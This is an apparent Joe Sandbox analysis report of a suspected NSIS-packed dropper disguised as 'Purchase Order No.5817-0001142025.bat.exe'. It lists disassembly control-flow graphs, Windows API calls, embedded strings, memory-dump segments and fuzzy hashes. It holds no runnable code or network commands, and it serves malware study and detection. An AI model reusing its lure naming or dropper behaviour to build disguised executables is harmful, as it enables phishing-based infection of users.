                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                      • String ID: "C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe$C:\Users\user\eftermodnendes\ringeagt$C:\Users\user\eftermodnendes\ringeagt\Bruttotrkkortet120$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$user32::EnumWindows(i r1 ,i 0)$~nsu%X.tmp
                                                                      • API String ID: 1813718867-1142599839
                                                                      • Opcode ID: 0478bff6c520e1fcae09ae2a6132b709cffae3f0026663cdf2ec71cee886cdca
                                                                      • Instruction ID: d2a3103bd0adf94391fd0ebfa47e937d37e61a7cc597b22c14a72094b2238e17
                                                                      • Opcode Fuzzy Hash: 0478bff6c520e1fcae09ae2a6132b709cffae3f0026663cdf2ec71cee886cdca
                                                                      • Instruction Fuzzy Hash: 4CF1E531604300AAD320AF759D05B2B7EE8AB8570AF11483FF585B22D1DB7C9A41CB6E

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 357 405d8e-405db4 call 406059 360 405db6-405dc8 DeleteFileW 357->360 361 405dcd-405dd4 357->361 364 405f4a-405f4e 360->364 362 405dd6-405dd8 361->362 363 405de7-405df7 call 406682 361->363 365 405ef8-405efd 362->365 366 405dde-405de1 362->366 370 405e06-405e07 call 405f9d 363->370 371 405df9-405e04 lstrcatW 363->371 365->364 369 405eff-405f02 365->369 366->363 366->365 372 405f04-405f0a 369->372 373 405f0c-405f14 call 4069df 369->373 374 405e0c-405e10 370->374 371->374 372->364 373->364 381 405f16-405f2a call 405f51 call 405d46 373->381 377 405e12-405e1a 374->377 378 405e1c-405e22 lstrcatW 374->378 377->378 380 405e27-405e43 lstrlenW FindFirstFileW 377->380 378->380 382 405e49-405e51 380->382 383 405eed-405ef1 380->383 397 405f42-405f45 call 405707 381->397 398 405f2c-405f2f 381->398 386 405e71-405e85 call 406682 382->386 387 405e53-405e5b 382->387 383->365 385 405ef3 383->385 385->365 399 405e87-405e8f 386->399 400 405e9c-405ea7 call 405d46 386->400 391 405ed0-405ee0 FindNextFileW 387->391 392 405e5d-405e65 387->392 391->382 395 405ee6-405ee7 FindClose 391->395 392->386 396 405e67-405e6f 392->396 395->383 396->386 396->391 397->364 398->372 401 405f31-405f40 call 405707 call 406442 398->401 399->391 402 405e91-405e9a call 405d8e 399->402 410 405ec8-405ecb call 405707 400->410 411 405ea9-405eac 400->411 401->364 402->391 410->391 414 405ec0-405ec6 411->414 415 405eae-405ebe call 405707 call 406442 411->415 414->391 415->391
                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(?,?,75923420,75922EE0,"C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe"), ref: 00405DB7
                                                                      • lstrcatW.KERNEL32(00424F50,\*.*,00424F50,?,?,75923420,75922EE0,"C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe"), ref: 00405DFF
                                                                      • lstrcatW.KERNEL32(?,0040A014,?,00424F50,?,?,75923420,75922EE0,"C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe"), ref: 00405E22
                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,00424F50,?,?,75923420,75922EE0,"C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe"), ref: 00405E28
                                                                      • FindFirstFileW.KERNEL32(00424F50,?,?,?,0040A014,?,00424F50,?,?,75923420,75922EE0,"C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe"), ref: 00405E38
                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ED8
                                                                      • FindClose.KERNEL32(00000000), ref: 00405EE7
                                                                      Strings
                                                                      • POB, xrefs: 00405DE7
                                                                      • "C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe", xrefs: 00405D97
                                                                      • \*.*, xrefs: 00405DF9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                      • String ID: "C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe"$POB$\*.*
                                                                      • API String ID: 2035342205-2092885686
                                                                      • Opcode ID: 3d2f7fed8d6250162ff3c39f7b63e528597fb1dc0209ffdda96aed75cda8f6cd
                                                                      • Instruction ID: 5ad7ae4105776224b4bb644c15053e07d5ebc7bd6c5330578b1f64027da07968
                                                                      • Opcode Fuzzy Hash: 3d2f7fed8d6250162ff3c39f7b63e528597fb1dc0209ffdda96aed75cda8f6cd
                                                                      • Instruction Fuzzy Hash: 6F41D330400A15AACB21AB65CC49BBF7678EF41718F24417FF895B11C1D77C4A82DEAE

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 713 406da0-406da5 714 406e16-406e34 713->714 715 406da7-406dd6 713->715 716 40740c-407421 714->716 717 406dd8-406ddb 715->717 718 406ddd-406de1 715->718 719 407423-407439 716->719 720 40743b-407451 716->720 721 406ded-406df0 717->721 722 406de3-406de7 718->722 723 406de9 718->723 726 407454-40745b 719->726 720->726 724 406df2-406dfb 721->724 725 406e0e-406e11 721->725 722->721 723->721 727 406e00-406e0c 724->727 728 406dfd 724->728 729 406fe3-407001 725->729 730 407482-40748e 726->730 731 40745d-407461 726->731 732 406e76-406ea4 727->732 728->727 736 407003-407017 729->736 737 407019-40702b 729->737 742 406c24-406c2d 730->742 733 407610-40761a 731->733 734 407467-40747f 731->734 740 406ec0-406eda 732->740 741 406ea6-406ebe 732->741 739 407626-407639 733->739 734->730 738 40702e-407038 736->738 737->738 743 40703a 738->743 744 406fdb-406fe1 738->744 745 40763e-407642 739->745 746 406edd-406ee7 740->746 741->746 747 406c33 742->747 748 40763b 742->748 749 406fb6-406fba 743->749 750 40714b-407158 743->750 744->729 751 406f7f-406f89 744->751 756 406eed 746->756 757 406e5e-406e64 746->757 752 406c3a-406c3e 747->752 753 406d7a-406d9b 747->753 754 406cdf-406ce3 747->754 755 406d4f-406d53 747->755 748->745 766 406fc0-406fd8 749->766 767 4075c2-4075cc 749->767 750->742 762 4075ce-4075d8 751->762 763 406f8f-406fb1 751->763 752->739 768 406c44-406c51 752->768 753->716 760 406ce9-406d02 754->760 761 40758f-407599 754->761 758 406d59-406d6d 755->758 759 40759e-4075a8 755->759 773 406e43-406e5b 756->773 774 4075aa-4075b4 756->774 764 406f17-406f1d 757->764 765 406e6a-406e70 757->765 770 406d70-406d78 758->770 759->739 775 406d05-406d09 760->775 761->739 762->739 763->750 771 406f7b 764->771 772 406f1f-406f3d 764->772 765->732 765->771 766->744 767->739 768->748 776 406c57-406c9d 768->776 770->753 770->755 771->751 779 406f55-406f67 772->779 780 406f3f-406f53 772->780 773->757 774->739 775->754 781 406d0b-406d11 775->781 777 406cc5-406cc7 776->777 778 406c9f-406ca3 776->778 785 406cd5-406cdd 777->785 786 406cc9-406cd3 777->786 782 406ca5-406ca8 GlobalFree 778->782 783 406cae-406cbc GlobalAlloc 778->783 784 406f6a-406f74 779->784 780->784 787 406d13-406d1a 781->787 788 406d3b-406d4d 781->788 782->783 783->748 789 406cc2 783->789 784->764 790 406f76 784->790 785->775 786->785 786->786 791 406d25-406d35 GlobalAlloc 787->791 792 406d1c-406d1f GlobalFree 787->792 788->770 789->777 794 4075b6-4075c0 790->794 795 406efc-406f14 790->795 791->748 791->788 792->791 794->739 795->764
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
                                                                      • Instruction ID: 5203db86b2e08fd3ebfde089d8ff8c44169432d1db75552ad8ea7513f2b1afa9
                                                                      • Opcode Fuzzy Hash: 3ef02b19721ac815a4354a2b384e5822db0a29b40c19b0eeafe3a712687496ea
                                                                      • Instruction Fuzzy Hash: 64F16570D04229CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A86CF45
                                                                      APIs
                                                                      • FindFirstFileW.KERNELBASE(75923420,00425F98,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,004060A2,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp,75923420,?,75922EE0,00405DAE,?,75923420,75922EE0), ref: 004069EA
                                                                      • FindClose.KERNEL32(00000000), ref: 004069F6
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp, xrefs: 004069DF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsb8AAB.tmp
                                                                      • API String ID: 2295610775-766773280
                                                                      • Opcode ID: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                                      • Instruction ID: 87b64c9cece2c57c139ea7904c9da033401fae8fb112df8880c97ca139bbac6e
                                                                      • Opcode Fuzzy Hash: 5aa02b152b1bdaa4a45d264aeb005cec44e37fe5ecd5a9a233d7a39d055da6f3
                                                                      • Instruction Fuzzy Hash: EBD012716096205BD64067386E0C94B7A589F16331722CA36F06BF21E0D7348C628A9C

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 151 403d54-403d6c call 406a76 154 403d80-403db7 call 406550 151->154 155 403d6e-403d7e call 4065c9 151->155 160 403db9-403dca call 406550 154->160 161 403dcf-403dd5 lstrcatW 154->161 164 403dda-403e03 call 40402a call 406059 155->164 160->161 161->164 169 403e95-403e9d call 406059 164->169 170 403e09-403e0e 164->170 176 403eab-403ed0 LoadImageW 169->176 177 403e9f-403ea6 call 4066bf 169->177 170->169 171 403e14-403e3c call 406550 170->171 171->169 178 403e3e-403e42 171->178 180 403f51-403f59 call 40140b 176->180 181 403ed2-403f02 RegisterClassW 176->181 177->176 182 403e54-403e60 lstrlenW 178->182 183 403e44-403e51 call 405f7e 178->183 194 403f63-403f6e call 40402a 180->194 195 403f5b-403f5e 180->195 184 404020 181->184 185 403f08-403f4c SystemParametersInfoW CreateWindowExW 181->185 189 403e62-403e70 lstrcmpiW 182->189 190 403e88-403e90 call 405f51 call 406682 182->190 183->182 188 404022-404029 184->188 185->180 189->190 193 403e72-403e7c GetFileAttributesW 189->193 190->169 197 403e82-403e83 call 405f9d 193->197 198 403e7e-403e80 193->198 204 403f74-403f8e ShowWindow call 406a06 194->204 205 403ff7-403fff call 4057da 194->205 195->188 197->190 198->190 198->197 210 403f90-403f95 call 406a06 204->210 211 403f9a-403fac GetClassInfoW 204->211 212 404001-404007 205->212 213 404019-40401b call 40140b 205->213 210->211 217 403fc4-403ff5 DialogBoxParamW call 40140b call 403ca4 211->217 218 403fae-403fbe GetClassInfoW RegisterClassW 211->218 212->195 214 40400d-404014 call 40140b 212->214 213->184 214->195 217->188 218->217
                                                                      APIs
                                                                        • Part of subcall function 00406A76: GetModuleHandleA.KERNEL32(?,00000020,?,00403755,0000000C,?,?,?,?,?,?,?,?), ref: 00406A88
                                                                        • Part of subcall function 00406A76: GetProcAddress.KERNEL32(00000000,?), ref: 00406AA3
                                                                      • lstrcatW.KERNEL32(1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe",00008001), ref: 00403DD5
                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\eftermodnendes\ringeagt,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000,00000002,75923420), ref: 00403E55
                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\eftermodnendes\ringeagt,1033,00422F48,80000001,Control Panel\Desktop\ResourceLocale,00000000,00422F48,00000000), ref: 00403E68
                                                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403E73
                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\eftermodnendes\ringeagt), ref: 00403EBC
                                                                        • Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6
                                                                      • RegisterClassW.USER32(00428A00), ref: 00403EF9
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403F11
                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F46
                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403F7C
                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,00428A00), ref: 00403FA8
                                                                      • GetClassInfoW.USER32(00000000,RichEdit,00428A00), ref: 00403FB5
                                                                      • RegisterClassW.USER32(00428A00), ref: 00403FBE
                                                                      • DialogBoxParamW.USER32(?,00000000,00404102,00000000), ref: 00403FDD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: "C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\eftermodnendes\ringeagt$Call$Control Panel\Desktop\ResourceLocale$H/B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                      • API String ID: 1975747703-2047756363
                                                                      • Opcode ID: 1dbc0aa764a7a3bc96806bc1c5cdbb5ab10d7d6512463466f43f37ee2b0e4de0
                                                                      • Instruction ID: 33830a549d8bd1c9ff3d4095a28b7d5feb3a0022977f60bfd4e6bbc11b1c7dcb
                                                                      • Opcode Fuzzy Hash: 1dbc0aa764a7a3bc96806bc1c5cdbb5ab10d7d6512463466f43f37ee2b0e4de0
                                                                      • Instruction Fuzzy Hash: 4661D570200741BAD620AB669E46F2B3A7CEB84709F41453FFA45B61E2DF795902CB2D

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 225 4030d5-403123 GetTickCount GetModuleFileNameW call 406172 228 403125-40312a 225->228 229 40312f-40315d call 406682 call 405f9d call 406682 GetFileSize 225->229 230 40336f-403373 228->230 237 403163 229->237 238 403248-403256 call 403033 229->238 240 403168-40317f 237->240 244 403327-40332c 238->244 245 40325c-40325f 238->245 242 403181 240->242 243 403183-40318c call 4035e7 240->243 242->243 251 403192-403199 243->251 252 4032e3-4032eb call 403033 243->252 244->230 247 403261-403279 call 4035fd call 4035e7 245->247 248 40328b-4032d7 GlobalAlloc call 406bd1 call 4061a1 CreateFileW 245->248 247->244 274 40327f-403285 247->274 272 4032d9-4032de 248->272 273 4032ed-40331d call 4035fd call 403376 248->273 256 403215-403219 251->256 257 40319b-4031af call 40612d 251->257 252->244 261 403223-403229 256->261 262 40321b-403222 call 403033 256->262 257->261 277 4031b1-4031b8 257->277 267 403238-403240 261->267 268 40322b-403235 call 406b63 261->268 262->261 267->240 271 403246 267->271 268->267 271->238 272->230 286 403322-403325 273->286 274->244 274->248 277->261 280 4031ba-4031c1 277->280 280->261 281 4031c3-4031ca 280->281 281->261 283 4031cc-4031d3 281->283 283->261 285 4031d5-4031f5 283->285 285->244 287 4031fb-4031ff 285->287 286->244 288 40332e-40333f 286->288 289 403201-403205 287->289 290 403207-40320f 287->290 291 403341 288->291 292 403347-40334c 288->292 289->271 289->290 290->261 293 403211-403213 290->293 291->292 294 40334d-403353 292->294 293->261 294->294 295 403355-40336d call 40612d 294->295 295->230
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 004030E9
                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe,00000400), ref: 00403105
                                                                        • Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe,80000000,00000003), ref: 00406176
                                                                        • Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406198
                                                                      • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe,C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe,80000000,00000003), ref: 0040314E
                                                                      • GlobalAlloc.KERNELBASE(00000040,00008001), ref: 00403290
                                                                      Strings
                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403327
                                                                      • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032D9
                                                                      • soft, xrefs: 004031C3
                                                                      • "C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe", xrefs: 004030DE
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004030DF, 004032A8
                                                                      • Inst, xrefs: 004031BA
                                                                      • C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe, xrefs: 004030EF, 004030FE, 00403112, 0040312F
                                                                      • Null, xrefs: 004031CC
                                                                      • Error launching installer, xrefs: 00403125
                                                                      • C:\Users\user\Desktop, xrefs: 00403130, 00403135, 0040313B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093481258.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093619612.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase Order No.jbxd
                                                                      Similarity
                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                      • String ID: "C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase Order No.5817-0001142025.bat.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                      • API String ID: 2803837635-2415412719
                                                                      • Opcode ID: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
                                                                      • Instruction ID: fa10dec2ede943269712b0c7dd26c00cc534fb31fc6fa5581d899c5550bae655
                                                                      • Opcode Fuzzy Hash: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
                                                                      • Instruction Fuzzy Hash: 0171B071E00204ABDB20DFA4ED86B9E7AACAB04316F60457FF515B62D1CB7C9E418B5C

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 298 4066bf-4066c8 299 4066ca-4066d9 298->299 300 4066db-4066f5 298->300 299->300 301 406905-40690b 300->301 302 4066fb-406707 300->302 304 406911-40691e 301->304 305 406719-406726 301->305 302->301 303 40670d-406714 302->303 303->301 307 406920-406925 call 406682 304->307 308 40692a-40692d 304->308 305->304 306 40672c-406735 305->306 310 4068f2 306->310 311 40673b-40677e 306->311 307->308 312 406900-406903 310->312 313 4068f4-4068fe 310->313 314 406784-406790 311->314 315 406896-40689a 311->315 312->301 313->301 316 406792 314->316 317 40679a-40679c 314->317 318 40689c-4068a3 315->318 319 4068ce-4068d2 315->319 316->317 320 4067d6-4067d9 317->320 321 40679e-4067c4 call 406550 317->321 324 4068b3-4068bf call 406682 318->324 325 4068a5-4068b1 call 4065c9 318->325 322 4068e2-4068f0 lstrlenW 319->322 323 4068d4-4068dd call 4066bf 319->323 329 4067db-4067e7 GetSystemDirectoryW 320->329 330 4067ec-4067ef 320->330 338 4067ca-4067d1 call 4066bf 321->338 339 40687e-406881 321->339 322->301 323->322 334 4068c4-4068ca 324->334 325->334 335 406879-40687c 329->335 336 406801-406805 330->336 337 4067f1-4067fd GetWindowsDirectoryW 330->337 334->322 340 4068cc 334->340 335->339 341 40688e-406894 call 406930 335->341 336->335 342 406807-406825 336->342 337->336 338->335 339->341 344 406883-406889 lstrcatW 339->344 340->341 341->322 346 406827-40682d 342->346 347 406839-406851 call 406a76 342->347 344->341 352 406835-406837 346->352 355 406853-406866 SHGetPathFromIDListW CoTaskMemFree 347->355 356 406868-406871 347->356 352->347 353 406873-406877 352->353 353->335 355->353 355->356 356->342 356->353
                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004067E1
                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 004067F7
                                                                      • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406855
                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040685E
                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 00406889
                                                                      • lstrlenW.KERNEL32(Call,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 004068E3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3093436983.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3093406445.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3093460679.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
